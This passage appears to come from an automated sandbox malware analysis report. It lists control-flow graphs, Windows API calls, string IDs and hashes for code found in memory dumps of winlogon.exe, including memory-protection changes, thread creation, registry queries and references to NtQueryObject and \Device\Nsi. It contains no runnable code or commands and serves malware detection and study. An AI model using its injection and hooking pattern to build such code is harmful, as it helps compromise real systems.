                                                                      • Opcode Fuzzy Hash: 2ff11c1be90479a1e6cf58369367b5af2ea5d024f86bdfb82a75ac5a15ce7897
                                                                      • Instruction Fuzzy Hash: 7BD16876215BC9C5DA719B1AE49439EB7A0FBC8B88F100126EE8D477A5DF39C551CF00

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 226 1e858985810-1e85898583c 227 1e85898584d-1e858985856 226->227 228 1e85898583e-1e858985846 226->228 229 1e858985867-1e858985870 227->229 230 1e858985858-1e858985860 227->230 228->227 231 1e858985881-1e85898588a 229->231 232 1e858985872-1e85898587a 229->232 230->229 233 1e858985896-1e8589858a1 GetCurrentThreadId 231->233 234 1e85898588c-1e858985891 231->234 232->231 235 1e8589858a3-1e8589858a8 233->235 236 1e8589858ad-1e8589858b4 233->236 237 1e858985e13-1e858985e1a 234->237 235->237 238 1e8589858c1-1e8589858ca 236->238 239 1e8589858b6-1e8589858bc 236->239 240 1e8589858d6-1e8589858e2 238->240 241 1e8589858cc-1e8589858d1 238->241 239->237 242 1e8589858e4-1e858985909 240->242 243 1e85898590e-1e858985965 call 1e858985e20 * 2 240->243 241->237 242->237 248 1e858985967-1e85898596e 243->248 249 1e85898597a-1e858985983 243->249 252 1e858985970 248->252 253 1e858985976 248->253 250 1e858985995-1e85898599e 249->250 251 1e858985985-1e858985992 249->251 254 1e8589859a0-1e8589859b0 250->254 255 1e8589859b3-1e8589859d8 call 1e858987fa0 250->255 251->250 256 1e8589859f0-1e8589859f6 252->256 257 1e8589859e6-1e8589859ea 253->257 254->255 265 1e858985a6d-1e858985a82 call 1e858984400 255->265 266 1e8589859de 255->266 259 1e858985a25-1e858985a2b 256->259 260 1e8589859f8-1e858985a14 call 1e858984ad0 256->260 257->256 263 1e858985a55-1e858985a68 259->263 264 1e858985a2d-1e858985a4c call 1e858987fdc 259->264 260->259 271 1e858985a16-1e858985a1e 260->271 263->237 264->263 273 1e858985a91-1e858985a9a 265->273 274 1e858985a84-1e858985a8c 265->274 266->257 271->259 275 1e858985aac-1e858985afa call 1e8589940e0 273->275 276 1e858985a9c-1e858985aa9 273->276 274->257 279 1e858985b02-1e858985b0a 275->279 276->275 280 1e858985b10-1e858985bfb call 1e858987b80 279->280 281 1e858985c17-1e858985c1f 279->281 293 1e858985bfd 280->293 294 1e858985bff-1e858985c0e call 1e8589847a0 280->294 282 1e858985c21-1e858985c34 call 1e858984cd0 281->282 283 1e858985c63-1e858985c6b 281->283 298 1e858985c36 282->298 299 1e858985c38-1e858985c61 282->299 286 1e858985c77-1e858985c86 283->286 287 1e858985c6d-1e858985c75 283->287 291 1e858985c88 286->291 292 1e858985c8f 286->292 287->286 290 1e858985c94-1e858985ca1 287->290 296 1e858985ca3 290->296 297 1e858985ca4-1e858985cf9 call 1e858993a40 290->297 291->292 292->290 293->281 302 1e858985c10 294->302 303 1e858985c12 294->303 296->297 305 1e858985d08-1e858985da1 call 1e858984c50 call 1e858984bb0 VirtualProtect 297->305 306 1e858985cfb-1e858985d03 297->306 298->283 299->281 302->281 303->279 311 1e858985db1-1e858985e11 305->311 312 1e858985da3-1e858985da8 GetLastError 305->312 311->237 312->311
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: d1efe80aa896adf56c352d5c0170c98584534c44e36adba6730078e70e045cb7
                                                                      • Instruction ID: 522768cb9165ebf6b748bb36accd7d408afbd4fcefcdb0d12c946d5185b2e25b
                                                                      • Opcode Fuzzy Hash: d1efe80aa896adf56c352d5c0170c98584534c44e36adba6730078e70e045cb7
                                                                      • Instruction Fuzzy Hash: C2029736229BC5C6EB608B55E49439EF7A0F7C4794F104126EA8E87BA9DF79C454CF00

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID:
                                                                      • API String ID: 1092925422-0
                                                                      • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                                      • Instruction ID: 6504a226cbacb16d08a7b617b85923eab210ee2dc2f24c4c3955bc1a6d9ff664
                                                                      • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                                      • Instruction Fuzzy Hash: 9811E936625781D3EB249B21E44429EB7B1FB49B84F044136DE4E037A8EF7EC9558B84
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000003.2361473448.000001E858950000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_3_1e858950000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Protect$AllocLibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 3316853933-0
                                                                      • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                      • Instruction ID: 3f3cb9d7b2f1dd9ccec39938e4baec1c2a0f0d8bc3636168fed7f0637dd6811c
                                                                      • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                      • Instruction Fuzzy Hash: B991E072B21690C7EB648F25E500BADF391FF55B9AF5481369E4E07B88DE38E812D710

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$AllocQuery
                                                                      • String ID:
                                                                      • API String ID: 31662377-0
                                                                      • Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                                      • Instruction ID: c74ab8962380babd794f7717a11efdf38a3ab2787b6864ecae9c648994eb6fbb
                                                                      • Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                                      • Instruction Fuzzy Hash: 2F31FD72229AC1C1EA30DA55E45439EF2A4FB99788F100536E9CE46BA8DF7CC5908F44

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32 ref: 000001E858983A35
                                                                      • PathFindFileNameW.SHLWAPI ref: 000001E858983A44
                                                                        • Part of subcall function 000001E858983F88: StrCmpNIW.SHLWAPI(?,?,?,000001E85898272F), ref: 000001E858983FA0
                                                                        • Part of subcall function 000001E858983EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001E858983A5B), ref: 000001E858983EDB
                                                                        • Part of subcall function 000001E858983EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E858983A5B), ref: 000001E858983F0E
                                                                        • Part of subcall function 000001E858983EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001E858983A5B), ref: 000001E858983F2E
                                                                        • Part of subcall function 000001E858983EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E858983A5B), ref: 000001E858983F47
                                                                        • Part of subcall function 000001E858983EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001E858983A5B), ref: 000001E858983F68
                                                                      • CreateThread.KERNELBASE ref: 000001E858983A8B
                                                                        • Part of subcall function 000001E858981E74: GetCurrentThread.KERNEL32 ref: 000001E858981E7F
                                                                        • Part of subcall function 000001E858981E74: CreateThread.KERNELBASE ref: 000001E858982043
                                                                        • Part of subcall function 000001E858981E74: TlsAlloc.KERNEL32 ref: 000001E858982049
                                                                        • Part of subcall function 000001E858981E74: TlsAlloc.KERNEL32 ref: 000001E858982055
                                                                        • Part of subcall function 000001E858981E74: TlsAlloc.KERNEL32 ref: 000001E858982061
                                                                        • Part of subcall function 000001E858981E74: TlsAlloc.KERNEL32 ref: 000001E85898206D
                                                                        • Part of subcall function 000001E858981E74: TlsAlloc.KERNEL32 ref: 000001E858982079
                                                                        • Part of subcall function 000001E858981E74: TlsAlloc.KERNEL32 ref: 000001E858982085
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 2779030803-0
                                                                      • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                                      • Instruction ID: df8c3281ef722b2b116e46804060982d6179dc25a9d7c515466c6086f327f8dd
                                                                      • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                                      • Instruction Fuzzy Hash: 8B115A316306C3D6FB60A720E9497EEF2A1AF94349F90413B9C1E815D1EF7CC558AA00

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 3733156554-0
                                                                      • Opcode ID: 8659059d713f10fb2b36df29fda00c285aebd80b25688c8f1dc0718561e99dbb
                                                                      • Instruction ID: c00648d99bde74b6e8437f54283572133123305961822debd08496dc2ccf2da5
                                                                      • Opcode Fuzzy Hash: 8659059d713f10fb2b36df29fda00c285aebd80b25688c8f1dc0718561e99dbb
                                                                      • Instruction Fuzzy Hash: 68F0B776629A85C4D630DB15E46179EB7A1EBC8BD4F144126BE8D07B69CE38C6848F00

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 000001E858981724: GetProcessHeap.KERNEL32 ref: 000001E85898172F
                                                                        • Part of subcall function 000001E858981724: HeapAlloc.KERNEL32 ref: 000001E85898173E
                                                                        • Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E8589817AE
                                                                        • Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E8589817DB
                                                                        • Part of subcall function 000001E858981724: RegCloseKey.ADVAPI32 ref: 000001E8589817F5
                                                                        • Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E858981815
                                                                        • Part of subcall function 000001E858981724: RegCloseKey.KERNELBASE ref: 000001E858981830
                                                                        • Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E858981850
                                                                        • Part of subcall function 000001E858981724: RegCloseKey.ADVAPI32 ref: 000001E85898186B
                                                                        • Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E85898188B
                                                                        • Part of subcall function 000001E858981724: RegCloseKey.ADVAPI32 ref: 000001E8589818A6
                                                                        • Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E8589818C6
                                                                      • SleepEx.KERNELBASE ref: 000001E858981BDF
                                                                        • Part of subcall function 000001E858981724: RegCloseKey.ADVAPI32 ref: 000001E8589818E1
                                                                        • Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E858981901
                                                                        • Part of subcall function 000001E858981724: RegCloseKey.ADVAPI32 ref: 000001E85898191C
                                                                        • Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E85898193C
                                                                        • Part of subcall function 000001E858981724: RegCloseKey.ADVAPI32 ref: 000001E858981957
                                                                        • Part of subcall function 000001E858981724: RegOpenKeyExW.KERNELBASE ref: 000001E858981977
                                                                        • Part of subcall function 000001E858981724: RegCloseKey.ADVAPI32 ref: 000001E858981992
                                                                        • Part of subcall function 000001E858981724: RegCloseKey.KERNELBASE ref: 000001E85898199C
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                      • String ID:
                                                                      • API String ID: 948135145-0
                                                                      • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                                      • Instruction ID: fb2d69a08c0bd96be6d9827e63446f9b261ba6250bb68e8c4871137dd0e1c47c
                                                                      • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                                      • Instruction Fuzzy Hash: CD319875221AC2C1FB54BB26DD513EDF3A5AF88BD0F1454339E0E87696EF24C8918A18

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 409 1e8589bf370-1e8589bf39f VirtualProtect
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                                      • Instruction ID: dfb11766e9a772cea2b6d458dc12c81d8fe618a40f6df5f239d096cd6c77f89e
                                                                      • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                                      • Instruction Fuzzy Hash: DED0C935732580C3E300DB11D8467D9A328F798701FC04016E94E926958F7CC659CB50

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 410 1e8589ef370-1e8589ef39f VirtualProtect
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                                      • Instruction ID: 4f415aab6ec79a6ad15c0757f50b7ca393db4c01867619b1dc6f6e15564129b6
                                                                      • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                                      • Instruction Fuzzy Hash: 0DD0C935731580C3E3059B11D8867D9A228FB98701FD04016E94E826948F7CC659CB51

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 408 1e85898f370-1e85898f39f VirtualProtect
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                                      • Instruction ID: f2f82aea16852abb07a512e0575c6dfa6c3969893e8edacd0d110e93ebb99610
                                                                      • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                                      • Instruction Fuzzy Hash: AFD0C935B31590C3E3009B11D8867EAA229F798701FC04016E94E926949F7CC659CB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                                      • Instruction ID: 3dd74bc31553336e469a116e649b845105e530a3f741a7ff32162260d63baafc
                                                                      • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                                      • Instruction Fuzzy Hash: 8EB125322286D0CAEB64DE66D9407EEF7A4FB44B86F44502AEE0D53A94EE35C980D740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                                      • Instruction ID: 4d69a82f80f6177ff8abf5a2c3fd8027fa005c9ce5d3e124411889fbcd1d775c
                                                                      • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                                      • Instruction Fuzzy Hash: 4DB135322206D0C6EB699F26D9407EDFBA4FB44B88F54502BEE4D53B94EE35C9A0D340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                                      • Instruction ID: 1ab4ae281b618004404ddc054f8e542846d077b8982b1782c31e5e65b4e15204
                                                                      • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                                      • Instruction Fuzzy Hash: 9EB137722206D2C6EB699F26D9407EDF3A5FB44B94F44502BEE0D53B94EE39C980DB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID: !-M
                                                                      • API String ID: 1239891234-3625753649
                                                                      • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                                      • Instruction ID: 01c22d40d67caee32f25ddbafaa66bab3ee175e491cf739d248804ca7decac6b
                                                                      • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                                      • Instruction Fuzzy Hash: 90413C36224BC0C6E764CF25E8803DEB7A4FB88758F540226EE9D46B99EF78C555CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
